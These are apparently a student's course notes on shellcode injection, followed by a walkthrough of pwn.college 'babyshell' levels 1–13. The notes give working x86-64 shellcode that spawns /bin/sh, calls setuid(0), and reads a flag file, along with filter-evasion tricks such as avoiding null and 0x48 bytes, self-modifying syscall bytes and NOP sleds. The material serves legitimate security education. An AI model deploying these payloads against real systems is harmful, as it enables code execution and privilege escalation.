Shellcode Injection
———–ASU CSE 365: System Security
Shellcode Injection: Introduction
①an example of vulnerability:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
//a.c
void bye1() {puts("Goodbye!");}
void bye2() {puts("Farewell!");}
void hello(char *name,void (*bye_func)()){
//A pointer to a character array name;
//A function pointer points to a function
printf("Hello %s!\n",name);
bye_func();
}
int main(int argc, char **argv){
char name[1024];
gets(name);
srand(time(0));
if(rand()%2) hello(bye1,name); //a mix-up of argument order
else hello(name,bye2);
}
|
use gcc -w -z execstack -o a a.c to compile
-w: Does not generate any warning information
-z: pass the keyword —-> linker
- So now the address of
bye1
is passed to name
so name
indicates the memory address of bye1
. Now name
is a binary code(the data is treated as code) .
- if we pass the character array
name
to bye_func
, the character array will be cast to a function pointer type. Because of the Incompatibility the program may be crash.
results:
use gdb to debugging:
x/s: viewing the string at an address
x/i: view the instructions at an address
②shellcode—>achieve arbitrary command execution like launch a shell execve("/bin/sh",NULL,NULL)
1
2
3
4
5
6
7
|
mov rax, 59 #execve
lea rdi, [rip+binsh] #first argument
mov rsi, 0 #second
mov rdx, 0 #third
syscall
binsh:
.string "/bin/sh"
|
we can intersperse arbitrary data in shellcode
- .byte 0x48, 0x45, 0x4C, 0x4C, 0x4F “HELLO”
- .string “HELLO” “HELLO\0”
other ways to embed data
1
2
3
|
mov rbx, 0x0068732f6e69622f #move "/bin/sh\0" into rbx
push rbx #push "/bin/sh\0" onto the stack
mov rdi, rsp #point rdi at the stack
|
③Non-shell shellcode
another goal:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
mov rbx, 0x00000067616c662f #push "/flag" filename
push rbx
mov rax, 2 #syscall number of open
mov rdi, rsp #point the first argument at stack (where we have "./flag")
mov rsi, 0 #NULL out the second argument (meaning, O_RDONLY)
syscall #trigger open("/flag",NULL)
mov rdi, 1 #first argument to sendfile is the file descriptor to output to (stdout)
mov rsi, rax #second argument is the file descriptor returned by open
mov rdx, 0 #third argument is the number of bytes to skip from the input file
mov r10, 1000 #fourth argument is the number of bytes to transfer to the output file
mov rax, 40 #syscall number of sendfile
syscall #trigger sendfile(1,fd,0,1000) [out_fd,in_fd,offset,count]
mov rax, 60 #syscall number of exit
syscall #trigger exit()
|
④building shellcode
1
2
3
|
gcc -nostdlib -static shellcode.s -o shellcode-elf
objcopy --dump-section .text=shellcode-raw shellcode-elf
#extract the .text (raw bytes of the shellcode)
|
shellcoding
echo "" >> shellcode-raw
to make a newline
this command pushes the binary code in the shellcode-raw
file to an executable file ./a
and the second cat
outputs the result of ./a
⑤debugging shellcode —> strace & gdb
“ctrl + r” can search for the matched last used command in the history in linux shell
1
2
3
4
|
x/5i $rip : print the next 5 instructions
examine qwords(x/gx $rsp), dwords(x/2dx $rsp), halfwords(x/4hx $rsp), and bytes(x/8b $rsp)
step one instruction(follow call):si, NOT s
step one instruction(step over call):ni, NOT n
|
Shellcode Injection: Common Challenges
①memory access width
- single byte: mov [rax], bl
- 2-byte word: mov [rax], bx
- 4-byte dword: mov [rax], ebx
- 8-byte qword: mov [rax], rbx
sometimes we should explicitly specify the size to avoid ambiguity. So like
- single byte: mov BYTE PTR [rax], bl
- 2-byte word: mov WORD PTR [rax], bx
- 4-byte dword: mov DWORD PTR [rax], ebx
- 8-byte qword: mov QWORD PTR [rax], rbx
②forbidden byte
shl: Logical left shift instruction
if the constraints on shellcode are too hard to get around with clever synonyms, but the page where your shellcode is mapped is writable. remember, code == data
for example, forbiddent the int 3
which is 0xcc in binary, and we can do like this:
1
2
|
inc BYTE PTR [rip] #rip is pointed to next instruction
.byte 0xcb
|
when testing this, we need to make sure .text is writable:
gcc -Wl, -N –static -nostdlib -o shellcode shellcode.s
③ multi-stage shellcode
stage 1: read(0, rip, 1000)
- On amd64, we can do ti with lea rax, [rip]
stage 2: whatever you want
④Useful Tools
pwntools: a library for writing exploits (and shellcode)
rappel: lets you explore the effects of instructions
amd64 opcode listing
some gdb plugins: Pwngdb, pwndbg, peda…
Shellcode Injection: Data Execution Prevention
①memory permissions
- PROT_READ: allow the process to read memory
- PROT_WRITE: allow the process to write memory
- PROT_EXEC: allow the process to execute memory
Intuition: all code is located in .text segments of the loaded ELF files. There’s no need to execute code located on the stack or in the heap. By default in modern systems, the stack and the heap are not executable. (NX: no-execute bit)
②de-protecting memory
Memory can be made executable using the mprotect() system call:
- Trick the program into mprotect(PROT_EXEC)ing our shellcode
- code reuse through Return Oriented Programming
- Jump to the shellcode
③JIT
1
2
3
4
5
6
7
|
cd /proc #there we have directories for all the processes running on machine
cat self/maps #self is a link to my current process id
ls -ld self
grep -l rwx */maps #see files that match these permissions
grep -l rwx */maps | parallel "ls -l {//}/exe" #get the xxx/exe and all of the programs have a page mapped in memory that is writable and executable.
cat xxx/maps
grep rwx xxx/maps
|
shellcode injection technique: JIT spraying
babyshell
code injection => This challenge reads in some bytes, modifies them , and executes them as code! Shellcode will be copied onto the stack and executed. Since the stack location is randomized on every execution, your shellcode will need to be position-independent.
level1: Placing shellcode on the stack at 0x123456789abc; Write and execute shellcode to read the flag
1
2
|
//babyshell.c
shellcode_size = read(0, shellcode_mem, 0x1000); //Reading 0x1000 bytes from stdin.
|
NR |
SYSCALL NAME |
references |
RAX |
RDI |
RSI |
RDX |
r10 |
r8 |
r9 |
105 |
setuid |
man/ cs/ |
0x69 |
uid_t uid |
- |
- |
- |
- |
- |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
# 1.s
.global _start
_start:
.intel_syntax noprefix
mov rax, 0x69 #setuid
mov rdi, 0
syscall
mov rax, 59 #execve
lea rdi, [rip+binsh]
mov rsi, 0
mov rdx, 0
syscall
binsh:
.string "/bin/sh"
|
in shell:
1
2
3
4
|
gcc -static -nostdlib 1.s -o 1
objcopy --dump-section .text=out 1
(cat out; cat) | /challenge/babyshell_level1
cat /flag #get flag
|
another way to directly read the flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
.global _start
_start:
.intel_syntax noprefix
#open
mov rsi, 0
lea rdi, [rip+flag]
mov rax, 2
syscall
#read
mov rdi, rax
mov rsi, rsp
mov rdx, 100
mov rax, 0
syscall
#write
mov rdi, 1
mov rsi, rsp
mov rdx, rax
mov rax, 1
syscall
#exit
mov rax, 60
mov rdi, 42
syscall
flag:
.ascii "/flag\0"
|
level2: a portion of your input is randomly skipped. nop sled
Repeat macro assemblers: This challenge will randomly skip up to 0x800 bytes in your shellcode. One way to evade this is to have your shellcode start with a long set of single-byte instructions that do nothing, such as nop
, before the
actual functionality of your code begins. When control flow hits any of these instructions, they will all harmlessly execute and then your real shellcode will run.
1
2
3
4
|
#add the code below to the front of the level1_code
.rept 0x800
nop
.endr
|
level3: inputted data is filtered before execution. Mapping shellcode memory at 0x12345678
- This challenge requires that your shellcode have no NULL bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
|
.global _start
_start:
.intel_syntax noprefix
#open
xor rsi, rsi #change
#lea rdi, [rip+flag]
mov byte ptr [rsp], '/'
mov byte ptr [rsp+1], 'f'
mov byte ptr [rsp+2], 'l'
mov byte ptr [rsp+3], 'a'
mov byte ptr [rsp+4], 'g'
xor cl, cl
mov byte ptr [rsp+5], cl
mov rdi, rsp
#mov byte ptr [rsp+5], '\0'
xor rax, rax #must xor!
mov al, 2 #change
syscall
#read
mov rdi, rax
mov rsi, rsp
xor rdx, rdx
mov dl, 100 #change
xor rax, rax #change
syscall
#write
xor rdi, rdi
mov dil, 1 #change
mov rsi, rsp
mov rdx, rax
xor rax, rax
mov al, 1 #change ;inc rax can also be good
syscall
#exit
xor rax, rax
mov al, 60 #change
xor rdi, rdi
mov dil, 42 #change
syscall
flag:
.ascii "/flag"
|
level4: This challenge requires that your shellcode have no H bytes
The “H bytes” is 0x48 in ASCII and we use the command below to dynamically see the variation.
1
|
gcc -static -nostdlib -o 1 1.s & objcopy --dump-section .text=out 1 & objdump -M intel -d 1 | grep 48
|
got:
1
2
3
4
5
6
7
8
9
10
11
12
13
|
401000: 48 31 f6 xor rsi,rsi
401021: 48 89 e7 mov rdi,rsp
401024: 48 31 c0 xor rax,rax
40102b: 48 89 c7 mov rdi,rax
40102e: 48 89 e6 mov rsi,rsp
401031: 48 31 d2 xor rdx,rdx
401036: 48 31 c0 xor rax,rax
40103b: 48 31 ff xor rdi,rdi
401041: 48 89 e6 mov rsi,rsp
401044: 48 89 c2 mov rdx,rax
401047: 48 31 c0 xor rax,rax
40104e: 48 31 c0 xor rax,rax
401053: 48 31 ff xor rdi,rdi
|
We can change the 64bits to 32bits to eliminate the 48
. Like the xor rsi, rsi
, convert it to xor esi, esi
. Like the mov rdi, rax
, convert it to mov edi, eax
. Finally it looks like this:
1
2
3
4
|
401020: 48 89 e7 mov rdi,rsp
40102b: 48 89 e6 mov rsi,rsp
40103b: 48 89 e6 mov rsi,rsp
401048: b0 3c mov al,0x3c
|
switch to 32-bit mode(edi, esp) but the command above is not easy to change. If we change mov rdi, rsp
to mov edi, esp
it will lose something because the address is 64-bit mode.
figure out: we can use the r8, r9 as the intermediate transition and r8, r9 won’t create the 48
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
|
.global _start
_start:
.intel_syntax noprefix
#open
xor esi, esi
#lea rdi, [rip+flag]
mov byte ptr [rsp], '/'
mov byte ptr [rsp+1], 'f'
mov byte ptr [rsp+2], 'l'
mov byte ptr [rsp+3], 'a'
mov byte ptr [rsp+4], 'g'
xor cl, cl
mov byte ptr [rsp+5], cl
mov r8, rsp
mov rdi, r8
#mov rdi, rsp
#mov byte ptr [rsp+5], '\0'
xor eax, eax
mov al, 2
syscall
#read
mov edi, eax
mov r8, rsp
mov rsi, r8
#mov rsi, rsp
xor edx, edx
mov dl, 100
xor eax, eax
syscall
#write
xor edi, edi
mov dil, 1
mov r8, rsp
mov rsi, r8
#mov rsi, rsp
mov edx, eax
xor eax, eax
mov al, 1
syscall
#exit
xor eax, eax
mov al, 60
xor edi, edi
mov dil, 42
syscall
flag:
.ascii "/flag"
|
level5: the inputted data cannot contain any form of system call bytes (syscall, sysenter, int)
- This filter works by scanning through the shellcode for the following byte sequences: 0f05 (
syscall
), 0f34 (sysenter
), and 80cd (int
). One way to evade this is to have your shellcode modify itself to insert the syscall
instructions at runtime.
1
2
3
4
5
|
hacker@shellcode-injection-level-5:~/module6/5$ objdump -M intel -d 1 | grep "0f 05"
40102a: 0f 05 syscall
40103a: 0f 05 syscall
40104d: 0f 05 syscall
401058: 0f 05 syscall
|
1
2
|
#see how the code works
cat out | strace /challenge/babyshell_level5
|
solution:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
|
.global _start
.intel_syntax noprefix
_start:
#fix up the syscalls-->significant
mov byte ptr [rip+syscall1], 0x0f
mov byte ptr [rip+syscall1+1], 0x05
mov byte ptr [rip+syscall2], 0x0f
mov byte ptr [rip+syscall2+1], 0x05
mov byte ptr [rip+syscall3], 0x0f
mov byte ptr [rip+syscall3+1], 0x05
mov byte ptr [rip+syscall4], 0x0f
mov byte ptr [rip+syscall4+1], 0x05
#open
mov rsi, 0
lea rdi, [rip+flag]
mov rax, 2
syscall1:
.byte 0x13
.byte 0x37
#read
mov rdi, rax
mov rsi, rsp
mov rdx, 100
mov rax, 0
syscall2:
.byte 0x13
.byte 0x37
#write
mov rdi, 1
mov rsi, rsp
mov rdx, rax
mov rax, 1
syscall3:
.byte 0x13
.byte 0x37
#exit
mov rax, 60
mov rdi, 42
syscall4:
.byte 0x13
.byte 0x37
flag:
.ascii "/flag"
|
Removing write permissions from first 4096 bytes of shellcode===>
level6: Removing write permissions from first 4096 bytes of shellcode
In order to get the flag, just directly add 4096 repeats in the front of the level5 code
level7: close the stdin, stderr, stdout
This challenge is about to close
- stdin, which means that it will be harder to pass in a stage-2 shellcode. You will need to figure an alternate solution (such as unpacking shellcode in memory) to get past complex filters.
- stderr, which means that you will not be able to get use file descriptor 2 for output.
- stdout, which means that you will not be able to get use file descriptor 1 for output. You will see no further output, and will need to figure out an alternate way of communicating data back to yourself.
1
2
3
4
5
6
7
8
9
10
|
#use the chmod to make the flag file can be read
#A permission of 004 corresponds to -------r--
- --- --- ---
-:- or d (file type)
1---: owner
2---: group
3---: other users
for each ---: rwx
|
this table is about the permission:
# |
permission |
rwx |
binary |
7 |
read + write + execute |
rwx |
111 |
6 |
read + write |
rw- |
110 |
5 |
read + execute |
r-x |
101 |
4 |
read |
r– |
100 |
3 |
write + execute |
-wx |
011 |
2 |
write |
-w- |
010 |
1 |
execute |
–x |
001 |
0 |
none |
— |
000 |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
|
.global _start
_start:
.intel_syntax noprefix
#chmod
mov rax, 90
lea rdi, [rip+flag]
mov rsi, 4 #other users can read the flag
#mov rsi, 777
syscall
#open
xor rsi, rsi
lea rdi, [rip+flag]
xor rax, rax
mov al, 2
syscall
#read
mov rdi, rax
mov rsi, rsp
xor rdx, rdx
mov dl, 100
xor rax, rax
syscall
#write
xor rdi, rdi
mov dil, 1
mov rsi, rsp
mov rdx, rax
xor rax, rax
mov al, 1
syscall
#exit
xor rax, rax
mov al, 60
xor rdi, rdi
mov dil, 42
syscall
flag:
.ascii "/flag"
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
#============================using in shell
gcc -nostdlib -static -o 1 1.s && objcopy --dump-section .text=out 1 && cat out | strace /challenge/babyshell_level7
strace ./1 #get the flag like this:
execve("./1", ["./1"], 0x7fff5cd94da0 /* 25 vars */) = 0
chmod("/flag", 004) = -1 EPERM (Operation not permitted)
open("/flag", O_RDONLY) = 3
read(3, "pwn.college{a"..., 100) = 56
write(1, "pwn.college{a"..., 56pwn.college{a}
) = 56
exit(42) = ?
+++ exited with 42 +++
#============================or just
./1 #can get the flag
|
Actually I still don’t know why the stderr, stdout, stdin which were being closed work and why the chmod
command can solve this question. I just know it is a way to be able to cat the flag. Maybe the chmod didn’t use the stdin, stdout and stderr so we bypassed it.
level8: only reading 0x12 bytes from stdin.
So we should replace the command like mov xxx, xxx
and xor xxx, xxx
with the push
, pop
and mov xxx, rsp
. the chmod
is what we need to do.
First, the linux soft link and chmod has a feature that Chmod does not work directly on soft links(which is the link file) when it operates on them, but directly on the files it points to(which is the true file). It just like we link a f
file in my home/hacker directory to the /flag
and we chmod the f
file not the /flag
file, if we succeed in changing the permissions of f
file, we succeed in changing the permissions of /flag
file, too.
1
|
ln -s /flag f #create the soft link
|
Second, we use assembly file to chmod: (less than 0x12(18 bytes))
1
2
3
4
5
6
7
8
9
|
.global _start
.intel_syntax noprefix
_start:
push 0x66 #b'f\x00'
mov rdi, rsp #rdi: f
push 4
pop rsi #rsi: 4
mov al, 0x5a # chmod('f',4)
syscall
|
Finally, we got a 0xc bytes shellcode.
1
2
3
4
5
6
7
8
9
10
11
12
|
gcc -nostdlib -static -o 1 1.s & objcopy --dump-section .text=out 1 & cat out | /challenge/babyshell_level8
==================================================================
Address | Bytes | Instructions
--------------------------------------------------------------------
0x000000002df88000 | 6a 66 | push 0x66
0x000000002df88002 | 48 89 e7 | mov rdi, rsp
0x000000002df88005 | 6a 04 | push 4
0x000000002df88007 | 5e | pop rsi
0x000000002df88008 | b0 5a | mov al, 0x5a
0x000000002df8800a | 0f 05 | syscall
===================================================================
cat f #or cat /flag can get the flag
|
level9: modified shellcode by overwriting every other 10 bytes with 0xcc.
0xcc, when interpreted as an instruction is an INT 3
, which is an interrupt to call into the debugger.Every 10 bytes, our command is overwritten with 10 interrupt commands(int 3 ), so we need to skip it using the .rept .endr
and jmp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
.global _start
.intel_syntax noprefix
_start:
push 0x66 #b'f\x00' #6a 66
mov rdi, rsp #48 89 e7
#push 4
#pop rsi
mov sil, 4 #40 b6 04
jmp next #eb 0a--->10 bytes
.rept 10
nop
.endr #10 0xcc
next:
mov al, 0x5a
syscall
|
level10: sorted your shellcode using bubblesort. This sort processed your shellcode 8 bytes at a time.
Keep in mind the impact of memory endianness(The Byte Storage Order of the memory) on this sort(e.g., the LSB being the right-most byte).
the code of level8 can go through it
1
2
3
4
5
6
7
8
9
10
11
12
|
int sort_max = shellcode_size / sizeof(uint64_t) - 1;
for (int i = 0; i < sort_max; i++)
for (int j = 0; j < sort_max-i-1; j++)
if (input[j] > input[j+1])
{
uint64_t x = input[j];
uint64_t y = input[j+1];
input[j] = y;
input[j+1] = x;
}
printf("This sort processed your shellcode %d bytes at a time.\n", sizeof(uint64_t));
//it print "This sort processed your shellcode 8 bytes at a time"
|
the sort_max = 12/8 -1 = 0 so we just skip it (?)
1
2
3
4
5
6
|
6a 66 | push 0x66
48 89 e7 | mov rdi, rsp
6a 04 | push 4
5e | pop rsi
b0 5a | mov al, 0x5a
0f 05 | syscall
|
level11:bubblesort+close stdin, which means that it will be harder to pass in a stage-2 shellcode
because we only have stage-1 shellcode so we can still use the code of level10 and get the flag.
level12: requires that every byte in your shellcode is unique
This level means that each byte of the machine code required to be entered is different. In level11 will be failed in bytes5 because push command is used twice so there’re two 6a
1
2
3
4
5
6
7
8
9
|
.global _start
.intel_syntax noprefix
_start:
push 0x66 #b'f\x00'
mov rdi, rsp
mov sil, 4
mov al, 0x5a
syscall
# get the flag
|
level13: only reading 0xc bytes from stdin
in level8 we have already make the code size to 0xc bytes so we can use the level12 code as well. The f
file is useful for level8 to level13.
level14: only reading 6 bytes from stdin